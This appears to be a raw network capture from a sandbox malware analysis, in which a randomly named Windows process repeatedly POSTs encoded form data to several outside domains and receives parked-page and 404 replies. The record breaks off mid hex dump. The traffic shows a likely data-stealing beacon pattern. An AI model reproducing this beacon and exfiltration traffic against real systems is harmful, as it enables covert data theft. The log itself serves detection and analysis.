Oct 15, 2024 16:20:45.949074030 CEST	781	OUT	POST /rk2p/ HTTP/1.1 Host: www.anthonyholland.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.anthonyholland.net Content-Length: 208 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.anthonyholland.net/rk2p/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 7a 72 69 50 51 4b 36 31 59 63 34 6e 4d 74 4e 49 58 4d 37 47 72 34 31 55 32 4c 44 31 73 32 46 69 6d 4b 54 49 39 57 6c 37 38 6e 4c 65 6c 59 71 43 6b 32 34 6f 39 2b 47 66 68 38 62 74 31 47 38 59 78 2b 30 5a 75 4e 31 49 38 6b 56 7a 67 36 35 6e 37 34 64 42 41 42 6e 70 67 6c 66 6f 31 39 6e 6c 38 4b 42 53 2f 53 63 56 6c 52 77 79 7a 49 6f 45 61 72 71 6f 41 71 39 55 57 70 64 70 36 77 36 75 46 35 68 61 6a 4a 34 33 69 4c 46 39 4b 6d 51 7a 4b 78 32 6c 43 65 4a 6c 72 79 51 6d 46 59 70 70 50 31 6d 73 39 34 42 4b 77 77 42 6d 65 4a 77 58 70 4b 35 59 41 76 7a 78 52 30 53 38 35 46 45 42 76 4f 2b 32 67 73 34 36 42 41 45 6e Data Ascii: K29=zriPQK61Yc4nMtNIXM7Gr41U2LD1s2FimKTI9Wl78nLelYqCk24o9+Gfh8bt1G8Yx+0ZuN1I8kVzg65n74dBABnpglfo19nl8KBS/ScVlRwyzIoEarqoAq9UWpdp6w6uF5hajJ43iLF9KmQzKx2lCeJlryQmFYppP1ms94BKwwBmeJwXpK5YAvzxR0S85FEBvO+2gs46BAEn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	53131	84.32.84.32	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:20:48.500741959 CEST	805	OUT	POST /rk2p/ HTTP/1.1 Host: www.anthonyholland.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.anthonyholland.net Content-Length: 232 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.anthonyholland.net/rk2p/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 7a 72 69 50 51 4b 36 31 59 63 34 6e 44 74 64 49 55 72 58 47 70 59 31 58 6f 62 44 31 69 6d 45 70 6d 4b 66 49 39 58 52 4e 38 52 54 65 6d 38 75 43 32 6c 67 6f 2b 2b 47 66 70 63 61 6d 36 6d 38 54 78 2b 77 52 75 49 4e 49 38 6b 42 7a 67 34 78 6e 37 50 70 47 42 52 6e 72 31 31 66 71 6f 4e 6e 6c 38 4b 42 53 2f 53 49 2f 6c 51 59 79 7a 38 55 45 49 4a 53 72 4a 4b 39 58 56 70 64 70 2b 77 36 71 46 35 68 34 6a 4e 68 2f 69 4f 5a 39 4b 6e 67 7a 4b 6b 4b 69 4d 65 4a 6a 6c 53 52 6d 42 6f 55 57 43 58 7a 41 79 35 39 74 6d 51 4e 61 62 2f 78 4e 31 35 35 37 53 2f 54 7a 52 32 4b 4f 35 6c 45 72 74 4f 47 32 79 37 30 64 4f 30 68 45 71 6b 37 4c 42 34 33 75 72 74 6b 4f 59 41 44 74 51 54 6a 43 6a 41 3d 3d Data Ascii: K29=zriPQK61Yc4nDtdIUrXGpY1XobD1imEpmKfI9XRN8RTem8uC2lgo++Gfpcam6m8Tx+wRuINI8kBzg4xn7PpGBRnr11fqoNnl8KBS/SI/lQYyz8UEIJSrJK9XVpdp+w6qF5h4jNh/iOZ9KngzKkKiMeJjlSRmBoUWCXzAy59tmQNab/xN1557S/TzR2KO5lErtOG2y70dO0hEqk7LB43urtkOYADtQTjCjA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	53132	84.32.84.32	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:20:51.047079086 CEST	1818	OUT	POST /rk2p/ HTTP/1.1 Host: www.anthonyholland.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.anthonyholland.net Content-Length: 1244 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.anthonyholland.net/rk2p/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 7a 72 69 50 51 4b 36 31 59 63 34 6e 44 74 64 49 55 72 58 47 70 59 31 58 6f 62 44 31 69 6d 45 70 6d 4b 66 49 39 58 52 4e 38 52 72 65 6c 50 6d 43 6b 55 67 6f 2f 2b 47 66 6f 63 62 68 36 6d 38 30 78 2b 49 56 75 49 4a 32 38 6d 35 7a 6d 64 6c 6e 35 39 42 47 59 42 6e 72 71 46 66 72 31 39 6e 77 38 4b 52 65 2f 53 59 2f 6c 51 59 79 7a 39 45 45 65 72 71 72 4c 4b 39 55 57 70 64 39 36 77 36 47 46 34 4a 43 6a 4e 73 64 69 61 56 39 4b 48 77 7a 4d 53 65 69 45 65 4a 68 6f 79 52 49 42 6f 59 33 43 58 2f 79 79 35 5a 54 6d 58 46 61 5a 70 45 67 74 38 59 6c 48 35 50 53 43 6e 6d 30 69 69 31 41 68 2b 61 74 39 34 6f 51 4d 67 39 50 73 52 7a 39 58 6f 79 73 38 74 6f 59 55 57 69 52 59 6a 43 6e 77 38 46 66 46 61 2f 73 4f 5a 48 58 76 49 59 49 2f 4e 48 70 52 63 4a 53 31 5a 78 31 6c 42 4c 64 68 52 44 43 4c 42 78 43 61 68 79 34 7a 64 4b 79 39 43 6d 55 43 78 73 55 50 51 76 46 61 79 79 45 6a 6d 55 5a 51 5a 2f 72 30 74 36 74 53 72 66 65 42 35 62 4e 50 45 72 4a 59 69 6e 7a 77 57 52 52 43 42 48 71 4f 56 30 7a 74 7a 51 79 2b 6d [TRUNCATED] Data Ascii: K29=zriPQK61Yc4nDtdIUrXGpY1XobD1imEpmKfI9XRN8RrelPmCkUgo/+Gfocbh6m80x+IVuIJ28m5zmdln59BGYBnrqFfr19nw8KRe/SY/lQYyz9EEerqrLK9UWpd96w6GF4JCjNsdiaV9KHwzMSeiEeJhoyRIBoY3CX/yy5ZTmXFaZpEgt8YlH5PSCnm0ii1Ah+at94oQMg9PsRz9Xoys8toYUWiRYjCnw8FfFa/sOZHXvIYI/NHpRcJS1Zx1lBLdhRDCLBxCahy4zdKy9CmUCxsUPQvFayyEjmUZQZ/r0t6tSrfeB5bNPErJYinzwWRRCBHqOV0ztzQy+mS996QF3fL59M43vsoboXXcBBEZXpp3F+Ba0va+rWbuhMn9eeqhdpfcIcdoHEjKfk6mqYnfiSm/ttJ92RyknHbLv40hPodX6cfI0feMuohpfLjMSOq39ITILF+QiWeWi1Y9B6cPGIHsHXrFE4DGcySM9IBCOuXgbNG7yciXpWkzVOah3HiGjSSgcfB5yzwjbiDPd/47YxUIUh9Eqh/R6Pcpu1wwfWbl0Dqwpp/5eIRnp00Pc3lVatFwFd0N4NM1QD2v0o+bnAWBlwPBUpPmq3iPW2imzjszX10tHmwxdOD5UK3FpOwevs5moZR9toVapaf9VgsA47jI0zlOZ8VQsWUnO68qpymxAyzmDNso6vJmB6cxnsQNokHAjTbKNu7blQ/56rS8hUvPkxnnqYjInlIvb1A1Y66EafdHtUeNThENuVlczJmQ/V+PoEI6wLqj3ZlVXv61E8koX6krHOupoiJmST886QgDslb4zS8RqhpxusvNhCi1W4FbJtC93jBX1rLUkJdU0YY4WwFk+/sk9tTLsP6E08GnhpGydugpgVYnALmhCmZy1ZYK1TbweEapWvo4CeQV8AzBxYFbzi5NqSNGTcsJ03Wuw2XIAAj2rATWi0lM8v/orqhjuzsn8lrW6hrCY/vcX6ABYLCdX8ZH5d7+UF8+xuPIi9OW [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	53133	84.32.84.32	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:20:53.591087103 CEST	515	OUT	GET /rk2p/?K29=+pKvT+T6aI4mLrB8VovWrZ9aurXWw1oR3cjAxWZJwguM4Y26gXhm+92mk/Xvsm02xKxFuv5v6XNtx495ochGFgbGl1fBlLTtvoEL4mYbjiJf04cpXMCfMoNuVfdD1R6NV9hbkdA=&ahL=jjndrjuPIn2hz HTTP/1.1 Host: www.anthonyholland.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Oct 15, 2024 16:20:54.415195942 CEST	1236	IN	HTTP/1.1 200 OK Server: hcdn Date: Tue, 15 Oct 2024 14:20:54 GMT Content-Type: text/html Content-Length: 10072 Connection: close Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: e6a351863e13eabfcd1298a0915363da-phx-edge6 Expires: Tue, 15 Oct 2024 14:20:53 GMT Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED] Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
Oct 15, 2024 16:20:54.415462971 CEST	1236	IN	Data Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
Oct 15, 2024 16:20:54.415476084 CEST	1236	IN	Data Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
Oct 15, 2024 16:20:54.416627884 CEST	636	IN	Data Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
Oct 15, 2024 16:20:54.416976929 CEST	1236	IN	Data Raw: 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 32 36 35 37 35 39 38 39 2d 34 34 22 20 61 73 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 Data Ascii: ger.com/gtag/js?id=UA-26575989-44" async></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer\|\|[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class
Oct 15, 2024 16:20:54.416987896 CEST	212	IN	Data Raw: 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 73 69 67 6e 2d 69 6e 2d 61 6c 74 22 3e 3c 2f 69 3e 20 4c 6f 67 69 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6e 61 76 3e 3c 64 69 76 20 63 6c 61 73 73 Data Ascii: ue class="fas fa-sign-in-alt"></i> Login</a></li></ul></div></div></nav><div class=empty-account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div
Oct 15, 2024 16:20:54.416999102 CEST	1236	IN	Data Raw: 63 6c 61 73 73 3d 6d 65 73 73 61 67 65 2d 73 75 62 74 69 74 6c 65 3e 48 61 70 70 79 20 74 6f 20 73 65 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 20 77 69 74 68 20 48 6f 73 74 69 6e 67 65 72 21 3c 2f 64 69 76 3e 3c 70 3e 59 6f 75 72 20 64 6f 6d 61 69 Data Ascii: class=message-subtitle>Happy to see your domain with Hostinger!</div><p>Your domain is active and is using Hostinger nameservers. Take the recommended steps below to continue your journey with Hostinger.</p></div><img src=https://cdn.hostinger
Oct 15, 2024 16:20:54.418298960 CEST	1236	IN	Data Raw: 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 43 68 61 6e 67 65 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 65 72 76 Data Ascii: stom-wrap"><div class=column-custom><div class=column-title>Change domain nameservers</div><br><p>Manage your domain nameservers in the domain management page of your Hostinger account.</p><br><a href=https://support.hostinger.com/en/articles/
Oct 15, 2024 16:20:54.418313980 CEST	424	IN	Data Raw: 65 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 61 3d 31 32 38 2c 66 3d 30 2c 69 3d 37 32 2c 28 63 3d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2d 22 29 29 3c 30 26 26 28 63 3d 30 29 2c 75 3d 30 3b 75 3c 63 3b 2b 2b 75 29 7b 69 66 28 74 26 26 28 79 5b Data Ascii: e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o
Oct 15, 2024 16:20:54.419559002 CEST	1236	IN	Data Raw: 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 31 29 22 29 3b 69 66 28 66 2b 3d 73 2a 70 2c 73 3c 28 43 3d 67 3c 3d 69 3f 31 3a 69 2b 32 36 Data Ascii: floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=sp,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p=o-C}if(i=n(f-l,h=m.length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("p
Oct 15, 2024 16:20:54.420438051 CEST	488	IN	Data Raw: 7d 2b 2b 66 2c 2b 2b 68 7d 72 65 74 75 72 6e 20 79 2e 6a 6f 69 6e 28 22 22 29 7d 2c 74 68 69 73 2e 54 6f 41 53 43 49 49 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 3d 6f 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e Data Ascii: }++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	53134	47.57.185.227	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:20:59.501064062 CEST	760	OUT	POST /nuiv/ HTTP/1.1 Host: www.726075.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.726075.buzz Content-Length: 208 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.726075.buzz/nuiv/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 32 75 47 62 6e 47 4c 4e 61 4b 61 50 51 71 6e 65 47 32 53 44 6d 64 43 2f 4f 62 67 72 32 48 32 65 6f 4b 76 2f 46 55 68 72 67 35 4f 59 6e 52 53 68 36 33 74 61 6e 56 30 45 59 78 5a 6c 46 48 65 75 4e 36 30 73 71 43 32 51 56 37 6e 30 66 56 72 35 34 77 39 49 41 42 6d 68 66 6d 32 6a 30 52 4e 34 2f 54 43 52 71 32 67 57 59 76 55 6f 59 4c 77 31 66 55 51 55 41 79 43 6d 74 38 4e 36 50 32 33 71 6c 4a 47 6d 46 36 6f 52 56 52 63 36 2f 44 37 61 35 79 50 6e 46 2b 74 2b 76 5a 6b 61 5a 41 38 69 64 4d 2b 77 62 74 70 75 35 53 64 4b 75 76 57 43 58 4d 53 6d 51 46 44 37 42 72 30 73 39 42 57 67 69 55 57 75 79 4b 51 4f 30 53 6c 47 Data Ascii: K29=2uGbnGLNaKaPQqneG2SDmdC/Obgr2H2eoKv/FUhrg5OYnRSh63tanV0EYxZlFHeuN60sqC2QV7n0fVr54w9IABmhfm2j0RN4/TCRq2gWYvUoYLw1fUQUAyCmt8N6P23qlJGmF6oRVRc6/D7a5yPnF+t+vZkaZA8idM+wbtpu5SdKuvWCXMSmQFD7Br0s9BWgiUWuyKQO0SlG
Oct 15, 2024 16:21:00.644406080 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 15 Oct 2024 14:21:00 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "6663edd0-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Oct 15, 2024 16:21:00.854639053 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 15 Oct 2024 14:21:00 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "6663edd0-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	53135	47.57.185.227	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:21:02.045878887 CEST	784	OUT	POST /nuiv/ HTTP/1.1 Host: www.726075.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.726075.buzz Content-Length: 232 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.726075.buzz/nuiv/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 32 75 47 62 6e 47 4c 4e 61 4b 61 50 51 4b 33 65 4b 78 47 44 67 39 43 38 4c 62 67 72 38 6e 32 61 6f 4b 6a 2f 46 57 4d 67 6e 4c 61 59 6e 77 43 68 37 31 46 61 6b 56 30 45 41 68 5a 67 42 48 65 6c 4e 36 6f 4f 71 48 4f 51 56 37 44 30 66 51 58 35 37 44 46 4a 43 52 6d 76 51 47 32 6c 77 52 4e 34 2f 54 43 52 71 32 6b 73 59 76 4d 6f 62 2b 34 31 4e 68 73 58 49 53 43 68 39 63 4e 36 4c 32 33 75 6c 4a 47 49 46 2b 78 32 56 58 59 36 2f 47 2f 61 34 6a 50 6b 66 75 74 6b 77 70 6c 32 51 67 70 75 63 2f 4b 74 53 72 6c 33 6e 51 74 4b 76 5a 58 59 4c 2f 53 46 43 56 6a 35 42 70 73 65 39 68 57 4b 67 55 75 75 67 64 63 70 37 6d 41 6c 77 2b 45 56 5a 69 6e 48 69 2b 50 6d 4c 48 79 57 4e 69 32 38 4c 51 3d 3d Data Ascii: K29=2uGbnGLNaKaPQK3eKxGDg9C8Lbgr8n2aoKj/FWMgnLaYnwCh71FakV0EAhZgBHelN6oOqHOQV7D0fQX57DFJCRmvQG2lwRN4/TCRq2ksYvMob+41NhsXISCh9cN6L23ulJGIF+x2VXY6/G/a4jPkfutkwpl2Qgpuc/KtSrl3nQtKvZXYL/SFCVj5Bpse9hWKgUuugdcp7mAlw+EVZinHi+PmLHyWNi28LQ==
Oct 15, 2024 16:21:03.031419039 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 15 Oct 2024 14:21:02 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "6663edd0-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	53136	47.57.185.227	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:21:04.592959881 CEST	1797	OUT	POST /nuiv/ HTTP/1.1 Host: www.726075.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.726075.buzz Content-Length: 1244 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.726075.buzz/nuiv/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 32 75 47 62 6e 47 4c 4e 61 4b 61 50 51 4b 33 65 4b 78 47 44 67 39 43 38 4c 62 67 72 38 6e 32 61 6f 4b 6a 2f 46 57 4d 67 6e 4c 69 59 6e 6e 43 68 36 55 46 61 6c 56 30 45 49 42 5a 68 42 48 65 34 4e 36 67 4b 71 48 53 75 56 35 72 30 64 79 76 35 36 79 46 4a 49 52 6d 76 53 47 32 6b 30 52 4d 36 2f 54 53 56 71 31 4d 73 59 76 4d 6f 62 2f 49 31 50 30 51 58 4f 53 43 6d 74 38 4e 4d 50 32 33 57 6c 4e 6a 31 46 2b 39 4d 56 47 6b 36 2f 6d 50 61 36 52 58 6b 55 75 74 36 7a 70 6c 75 51 67 30 73 63 2f 48 42 53 72 35 4a 6e 51 4a 4b 76 76 2b 59 4f 4c 65 6a 42 6c 33 6a 56 4c 51 62 39 6e 47 6c 75 48 43 30 73 65 38 6b 30 6b 30 31 35 4f 42 4c 63 51 2b 46 72 76 7a 6f 44 69 66 38 59 53 33 4e 58 71 59 68 35 43 